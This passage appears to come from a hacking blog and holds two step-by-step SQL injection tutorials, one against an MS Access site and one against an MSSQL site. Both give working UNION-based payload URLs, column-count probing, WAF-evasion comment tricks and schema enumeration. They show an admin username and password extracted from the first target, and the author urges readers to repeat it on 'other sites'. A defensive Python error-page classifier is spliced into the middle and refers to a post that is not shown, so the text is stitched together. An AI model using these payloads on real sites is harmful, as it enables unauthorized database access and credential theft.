<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNWlaIkvtXvMCF4bY_n58Hl78teTidamtoruIauw3b6R3GanSsh5NhnmL37EfircdnHMkmvq-amgw-qp4CmBv-LkyQQw84O3iqz7UL-MWpkzOL-E8rRoKyXuRRQcSs7n3DZpvQpu9FiGXD/s1600/MS-Acces+Injection+-Tutorial+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNWlaIkvtXvMCF4bY_n58Hl78teTidamtoruIauw3b6R3GanSsh5NhnmL37EfircdnHMkmvq-amgw-qp4CmBv-LkyQQw84O3iqz7UL-MWpkzOL-E8rRoKyXuRRQcSs7n3DZpvQpu9FiGXD/s400/MS-Acces+Injection+-Tutorial+2.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="color: red; font-size: small;"><b><span style="font-family: Arial;">The Microsoft Jet database engine does not recognize '9' as a valid field name or expression.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">So there are 8 columns.</span><br />
<span style="font-family: Arial; font-size: small;">Now let's prepare our <b>UNION BASED</b> query.</span><br />
<span style="font-family: Arial; font-size: small;">After executing the <b>UNION BASED</b> query we got an error: </span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%00</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Nm-UqZrhAtgot1L9NcuPU8zhg9HyxmC8pVOHp0WTjdsH0Psz2fyU-h9V1jGsLcZZtyEVetGa53yfxvCxcvcgEClHn12E4gr98vqHQ0nRlC_VCAAYIYQ8FD-Lj9cDHy2BXGp1t7pGbdZe/s1600/MS-Acces+Injection+-Tutorial+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Nm-UqZrhAtgot1L9NcuPU8zhg9HyxmC8pVOHp0WTjdsH0Psz2fyU-h9V1jGsLcZZtyEVetGa53yfxvCxcvcgEClHn12E4gr98vqHQ0nRlC_VCAAYIYQ8FD-Lj9cDHy2BXGp1t7pGbdZe/s400/MS-Acces+Injection+-Tutorial+3.png" title="MS-Access Injection -Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80004005'</span></b></span>
<br />
<span style="color: red; font-size: small;"><b><span style="font-family: Arial;">Query input must contain at least one table or query.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">Here comes the main part. Our column count is correct, so it seems the database behaves like MySQL 4, which has no information_schema to query. </span><br />
<span style="font-family: Arial; font-size: small;">So we have to guess the table and column names. First we guess the tables.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from Login;%00</b></span><br />
<span style="font-size: small;"><b>It gives us an error!</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22sac2Hw0cYZWVtTwzThs9hwK9BonpmeVUz61YNG0X60li08kx3uTE74JXn_8wH9h1IzEsYyWmj33wa9ha6iX3O8BRARg3zbDj62MDfunEdNAt5nZsJedfGtl1ekoOAjbpg07n80ueetR/s1600/MS-Acces+Injection+-Tutorial+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22sac2Hw0cYZWVtTwzThs9hwK9BonpmeVUz61YNG0X60li08kx3uTE74JXn_8wH9h1IzEsYyWmj33wa9ha6iX3O8BRARg3zbDj62MDfunEdNAt5nZsJedfGtl1ekoOAjbpg07n80ueetR/s400/MS-Acces+Injection+-Tutorial+4.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><b> ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e37'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;"><span style="color: red;">The Microsoft Jet database engine cannot
find the input table or query 'login'. Make sure it exists and that its
name is spelled correctly.</span></span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">It means this table does not exist. Let's try another<b>.</b></span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from tabladmin;%00</b></span><br />
<span style="font-size: small;"><b>Still the same error!!</b></span><br />
<span style="font-size: small;">But when we try the table <b>ADMIN</b> the error is gone.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8 from admin;%00</b></span><br />
<span style="font-size: small;">With the table <b>ADMIN</b> the error is gone and we can see the vulnerable columns on the web page.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1qZUczUqCnqmYiebD1zs2dfGvHueKV854pTdMn3oM_OYxeJk8Kye445x2B8vKdWbNrRfB0_lVrch28hWekWGsdhMp_AVDmPcXg8OtQ3u97JhVGwuVF3ZDQVo498AdbdlDCwKOXIxTkU-/s1600/MS-Acces+Injection+-Tutorial+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1qZUczUqCnqmYiebD1zs2dfGvHueKV854pTdMn3oM_OYxeJk8Kye445x2B8vKdWbNrRfB0_lVrch28hWekWGsdhMp_AVDmPcXg8OtQ3u97JhVGwuVF3ZDQVo498AdbdlDCwKOXIxTkU-/s400/MS-Acces+Injection+-Tutorial+6.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">You can see that 2, 3 and 6 are the vulnerable columns. Now we have to guess the column names; we put each guess into one of these vulnerable positions.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,admin_id,4,5,6,7,8 from admin;%00</b></span><br />
<span style="font-size: small;"><b>It gives us an error!</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Sbuj3-fjZ6py3AVppiF4OrtRM1v5MZXYy5378BE3BKHVd6YqnhLGndDNPVxMjllcWQk-sIxbP7d9MG4rEXzKSQ955R9U_7IfKOjDhwPO_E3uzysdqv6GsX6YhpR7k4FLTPC2JOJTBWLd/s1600/MS-Acces+Injection+-Tutorial+7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Sbuj3-fjZ6py3AVppiF4OrtRM1v5MZXYy5378BE3BKHVd6YqnhLGndDNPVxMjllcWQk-sIxbP7d9MG4rEXzKSQ955R9U_7IfKOjDhwPO_E3uzysdqv6GsX6YhpR7k4FLTPC2JOJTBWLd/s400/MS-Acces+Injection+-Tutorial+7.png" title="MS-Access Injection -Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e10'</span></b></span>
<br />
<span style="color: red; font-size: small;"><b><span style="font-family: Arial;">No value given for one or more required parameters.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">It means this column does not exist. Let's try another.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,login_id,4,5,6,7,8 from admin;%00</b></span><br />
<span style="font-size: small;"><b>Still the same error!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">When we put the <b>Username</b> column the error is gone.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,username,4,5,6,7,8 from admin;%00</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qy16lAoYtYIGKVnL48_PLIqDfmWUO90LGUdH5BVBZO67V-dH1_aVqZfjGDYw7y-vpDZKO5iGNsp_j7ChWA9yrODtd5eb-8d8vBD44GTkrnyM07w35yAoRMbpLFLZ0Mkw3EJLzrCld4z2/s1600/MS-Acces+Injection+-Tutorial+8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5qy16lAoYtYIGKVnL48_PLIqDfmWUO90LGUdH5BVBZO67V-dH1_aVqZfjGDYw7y-vpDZKO5iGNsp_j7ChWA9yrODtd5eb-8d8vBD44GTkrnyM07w35yAoRMbpLFLZ0Mkw3EJLzrCld4z2/s400/MS-Acces+Injection+-Tutorial+8.png" title="MS-Access Injection -Tutorial" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">So it gives us <b>Username:<span class="testo1">01775IO5</span></b></span><br />
<span class="testo1" style="font-size: small;">Now let's guess the column holding the admin password.</span><br />
<span class="testo1" style="font-size: small;"> </span><span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;">And the column <b>Password</b> also exists there.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,password,4,5,6,7,8 from admin;%00</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCYPeu4pLrYcV44a449Hs6bxOsVpeEVh1wG1yKiEIgiGwJExtgQe6Detx7prXxvNYnAQFs6Tce70sHV7qOQ-1c54jOqBPTXFiTeWSFZIxyVnbvzKOtN8s-sP-V7Lkyg4ecVrJUjFwAq00/s1600/MS-Access+Injection+-Tutorial+9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCYPeu4pLrYcV44a449Hs6bxOsVpeEVh1wG1yKiEIgiGwJExtgQe6Detx7prXxvNYnAQFs6Tce70sHV7qOQ-1c54jOqBPTXFiTeWSFZIxyVnbvzKOtN8s-sP-V7Lkyg4ecVrJUjFwAq00/s400/MS-Access+Injection+-Tutorial+9.png" title="MS-Access Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;">it Gives us<b> Password=<span class="testo1">"bEx0Th6</span></b></span><br />
<span class="testo1" style="font-size: small;">So we do the same on other sites to inject into the database.</span><br />
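The JET error pages quoted in this post, and the ODBC errors in the CONVERT post above, are what make both techniques work: the database's own message (a missing table, an unrecognized field, or a value that failed to convert) is returned to the client. As an added example that is not part of the original post, here is a Python response-side check a defender can run on captured HTTP bodies; it classifies the error, records what was disclosed, and shows the generic page a response filter should send instead. The sample bodies are constructed from the error texts quoted in the posts; the normal page and the reference id are placeholders.

```python
"""Classify verbose database error pages and show the generic page to return instead.

Added example; the sample bodies reuse the error texts quoted in the posts,
the normal page and the reference id are placeholders.
"""
import re

# Sample response bodies (constructed from the error texts quoted in the posts).
SAMPLES = {
    "normal": "Author profile page for id 46",
    "syntax": ("Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
               "[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark "
               "after the character string ''.\n/authorprofile.asp, line 10"),
    "convert_leak": ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07'\n"
                     "[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when "
                     "converting the nvarchar value 'museindia' to data type int.\n"
                     "/authorprofile.asp, line 10"),
    "jet_table": ("Microsoft JET Database Engine error '80040e37'\n"
                  "The Microsoft Jet database engine cannot\nfind the input table or query "
                  "'login'. Make sure it exists and that its\nname is spelled correctly.\n"
                  "/dettaglio-news.asp, line 91"),
    "jet_field": ("Microsoft JET Database Engine error '80040e14'\n"
                  "The Microsoft Jet database engine does not recognize '9' as a valid "
                  "field name or expression.\n/dettaglio-news.asp, line 91"),
    "jet_param": ("Microsoft JET Database Engine error '80040e10'\n"
                  "No value given for one or more required parameters.\n"
                  "/dettaglio-news.asp, line 91"),
}

ERROR_HEADER = re.compile(
    r"(?P<provider>Microsoft JET Database Engine|Microsoft OLE DB Provider for ODBC Drivers)"
    r"\s+error\s+'(?P<code>[0-9a-fA-F]{8})'")

# What each message hands to the client: a database value, a yes/no answer about a
# guessed table or column, or the server-side script path.
DISCLOSURES = {
    "conversion_value": re.compile(
        r"Conversion failed when converting the \w+ value '(?P<value>.*?)' to data type \w+\.", re.S),
    "unknown_table": re.compile(r"cannot\s+find the input table or query\s+'(?P<value>[^']*)'"),
    "unknown_field": re.compile(r"does not recognize\s+'(?P<value>[^']*)'\s+as a valid field name"),
    "script_location": re.compile(r"(?P<value>/[\w./-]+\.asp), line \d+"),
}

GENERIC_ERROR = "An error occurred while processing your request. Reference: {ref}"


def severity(code, disclosures):
    """Rank a finding by what the client learns from it."""
    if "conversion_value" in disclosures:
        return "data_leak"        # a database value was echoed (the CONVERT technique)
    if "unknown_table" in disclosures or "unknown_field" in disclosures or code == "80040e10":
        return "schema_oracle"    # confirms or denies a guessed table/column name
    return "verbose_error"


def inspect_response(body):
    """Return a finding dict for a verbose ODBC/JET error page, or None for a normal page."""
    header = ERROR_HEADER.search(body)
    if header is None:
        return None
    code = header.group("code").lower()
    disclosures = {}
    for kind, pattern in DISCLOSURES.items():
        match = pattern.search(body)
        if match:
            disclosures[kind] = " ".join(match.group("value").split())
    return {"provider": header.group("provider"), "code": code,
            "disclosures": disclosures, "severity": severity(code, disclosures)}


def filter_response(body, ref="placeholder-ref"):
    """Simulated response filter: swap any verbose database error for a generic page
    and return (body_to_send, finding) so the original can be logged server-side."""
    finding = inspect_response(body)
    if finding is None:
        return body, None
    return GENERIC_ERROR.format(ref=ref), finding


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        sent, finding = filter_response(body)
        print(name, "->", finding["severity"] if finding else "passed through", "|", sent)
```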
<span style="font-size: small;"><b><span class="testo1"><span style="color: magenta;">Hap</span><span style="color: #e06666;">py</span> <span style="color: #660000;">Inje</span><span style="color: #134f5c;">cting</span> <span style="color: #a2c4c9;">!!</span></span></b></span><br />
<b><span class="testo1" style="font-size: small;">AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee</span></b>
MSSQL Union Based Injection -Step by Step Guide (published 2015-07-19)<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX5xkYzdLW-6lPnln2N6L2OU_5YcjPwQr7gqbYImbvzKcZEPl9Mu2mSy8ahwMI4h2mmI2Caupiy4xlb8pJT_UGH1OBzrga-2UsLLtlByuxiTuJ3-Jcr6tOx9F_L-ywlxpc0aoAIGh-1Prw/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+www.raijee1337.blogspot.com+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX5xkYzdLW-6lPnln2N6L2OU_5YcjPwQr7gqbYImbvzKcZEPl9Mu2mSy8ahwMI4h2mmI2Caupiy4xlb8pJT_UGH1OBzrga-2UsLLtlByuxiTuJ3-Jcr6tOx9F_L-ywlxpc0aoAIGh-1Prw/s320/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+www.raijee1337.blogspot.com+1.png" title="MSSQL Union Based Injection -Step by Step Guide" width="320" /></a></span></div>
<span style="font-size: small;">In our previous tutorials we discussed MySQL and many methods of injecting a MySQL database. Now let's move on to injecting an MSSQL database.</span><br />
<span style="font-size: small;">In this tutorial we will discuss MSSQL union based injection. Although MSSQL injection is similar to MySQL injection, it is not the same, and MySQL is easier to inject than MSSQL.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">So let's start injecting.</span><br />
<span style="font-size: small;">We have a target site. First we have to check whether it is vulnerable to MSSQL injection. For this purpose we add a single quote ' at the end of the parameter.</span><br />
<span style="font-size: small;">Let's say our target site is the one below, and we add a single quote ' at the end to check for the vulnerability:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After sending the request with the single quote, it gives this type of error:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5bZ8fJEV62e3k6jPlPWk9paTZ89BZfTimU7E1Ht_5PpIySMDKOoV9GbxFsAkd9NtJDh3KO0hqM4Z_V2RKR-icMAEQCIFVucBq7RHrZ2TrFU8IYWCUagcsZuxXiTVN3ZW84yPkNEvDYC7M/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5bZ8fJEV62e3k6jPlPWk9paTZ89BZfTimU7E1Ht_5PpIySMDKOoV9GbxFsAkd9NtJDh3KO0hqM4Z_V2RKR-icMAEQCIFVucBq7RHrZ2TrFU8IYWCUagcsZuxXiTVN3ZW84yPkNEvDYC7M/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+1.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">ERROR:</span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for SQL Server</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Unclosed quotation mark after the character string ''.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/news.asp</span><span style="font-family: Arial;">, line 9</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">So this means our target site is vulnerable to MSSQL injection: the page passes the id parameter straight into the query and echoes the raw OLE DB error back to the client.</span><br />
<span style="font-family: Arial; font-size: small;">Next we have to balance the query. Here are some comment sequences we can try on the target site: </span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10-- Loading Fine !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10--+ Loading Fine !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10%23 Loading Fine !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10; Loading Fine !</b></span><br />
<span style="font-size: small;"><b><br /></b>
As you know, each site may sit behind a different WAF, so try the different comment sequences above when balancing the query.</span><br />
<span style="font-size: small;">After balancing the query, the next step is to count the columns. For this we normally use the ORDER BY clause.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 1--+ Site Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 5--+ Again Site Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 15--+ Again Site Loaded Normally and there is no any kind of error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 order by 16--+ Here we have Got Error !!</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaeWtHbtEBiDa76HIre13jYHj8OtQbJJO3N3oCLJirfGiarnDpaEysrNOPh0Tg2_VKvVQ6u5Cfx_TwAbnNFnCk1Fr-3qahTlIXdSJ-aOSjcdtaR5TqolNAspCVbJ-jeUMINLoorLsDE4nE/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaeWtHbtEBiDa76HIre13jYHj8OtQbJJO3N3oCLJirfGiarnDpaEysrNOPh0Tg2_VKvVQ6u5Cfx_TwAbnNFnCk1Fr-3qahTlIXdSJ-aOSjcdtaR5TqolNAspCVbJ-jeUMINLoorLsDE4nE/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+2.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><b> Error:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for SQL Server</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">The ORDER BY position number 16 is out of range of the number of items in the select list.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/news.asp</span><span style="font-family: Arial;">, line 9</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">So this means there are <b>15</b> columns in total. Now let's prepare our UNION based query. To find the vulnerable (displayed) columns we first have to make the original query return no rows, here with <b>and 1=2</b>, so that only our UNION row is displayed.</span><br />
<span style="font-family: Arial; font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing the UNION based query you can see the vulnerable column numbers printed on the web page.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis9WE4OPOnTy6xc4oO0x5fjRBcqbwD968AdPv2mIgr5bpyATmBBvUHGsXD5JIsqEDMLi8u5P-1Bw4T4awY7FGIMCwjJZVjgSNR_lbnn9DzgOfhZKe9n4fYsLovKxlLTj5oIpdd3VGYMLZH/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis9WE4OPOnTy6xc4oO0x5fjRBcqbwD968AdPv2mIgr5bpyATmBBvUHGsXD5JIsqEDMLi8u5P-1Bw4T4awY7FGIMCwjJZVjgSNR_lbnn9DzgOfhZKe9n4fYsLovKxlLTj5oIpdd3VGYMLZH/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+3.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">In my case columns 5, 6, 7, 8 and 9 are the vulnerable ones.</span><br />
<span style="font-size: small;">Now let's check the version. To find the version we use @@version; we cannot use version() here, because this is an MSSQL database, not MySQL.</span><br />
<span style="font-size: small;">Here is the query for checking the version:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing the query you can see the version printed on the web page:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMkAvqpJ4wrbTQzjj1zXNBEWBJmFtm7jw6MDMS1sQoFkL4JK5pgw4bI9tl8T8VTORceR4fA025vyN9hfGCErfgoOFrCKV3DYd0WNo6oY1Lyre5KQcFeMgfBNCZ05zWhQhRHEt3hyphenhyphenck0PZQ/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMkAvqpJ4wrbTQzjj1zXNBEWBJmFtm7jw6MDMS1sQoFkL4JK5pgw4bI9tl8T8VTORceR4fA025vyN9hfGCErfgoOFrCKV3DYd0WNo6oY1Lyre5KQcFeMgfBNCZ05zWhQhRHEt3hyphenhyphenck0PZQ/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+4.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><b> Version:</b></span><br />
<span style="font-size: small;"><b>Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64)
Apr 2 2010 15:48:46
Copyright (c) Microsoft Corporation
Express Edition with Advanced Services (64-bit) on Windows NT 6.2 (Build 9200: ) (Hypervisor) </b></span><br />
<span style="font-size: small;">Now let's check the current database name. For this we put <b>db_name()</b> in the vulnerable column.</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,db_name(),6,7,8,9,10,11,12,13,14,15--+</b></span><br />
<span style="font-size: small;">After executing this query you can see the database name printed out.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3WRl0qp13S_8oO9CN9GfN-gta3ynGKzgLn_Euel4alwumPvHl0u7GFioTHv3__rDUOpcfsigPLZOxBWSqeNtvFugnWu6yaKgnKALv5nlsi1UEGCKCUI5ePbqmMYFLXDMk2ghtJSJX8LsW/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3WRl0qp13S_8oO9CN9GfN-gta3ynGKzgLn_Euel4alwumPvHl0u7GFioTHv3__rDUOpcfsigPLZOxBWSqeNtvFugnWu6yaKgnKALv5nlsi1UEGCKCUI5ePbqmMYFLXDMk2ghtJSJX8LsW/s640/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+10.png" title="MSSQL Union Based Injection -Step by Step Guide" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Database Name:</b></span><br />
<span style="font-size: small;"><b>bietdb</b></span><br />
<span style="font-size: small;"><b>Here are some other functions and their uses:</b></span><br />
<span style="font-size: small;"><b>FUNCTION : USE</b></span><br />
<span style="font-size: small;"><b>@@version : Current version</b></span><br />
<span style="font-size: small;"><b>db_name() : Current database name</b></span><br />
<span style="font-size: small;"><b>System_user : Current user name</b></span><br />
<span style="font-size: small;"><b>User_name() : Current user name</b></span><br />
<span style="font-size: small;"><b>current_user() : Current user name</b></span><br />
<span style="font-size: small;">The next part is to get the tables from the database. As we cannot use group_concat in MSSQL, we have to get the tables one by one. So this will be our query for getting the tables:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--+</b></span><br />
<span style="font-size: small;">And you can see the first table name printed there.</span><br />
<div class="separator" style="clear: both; text-align: center;">
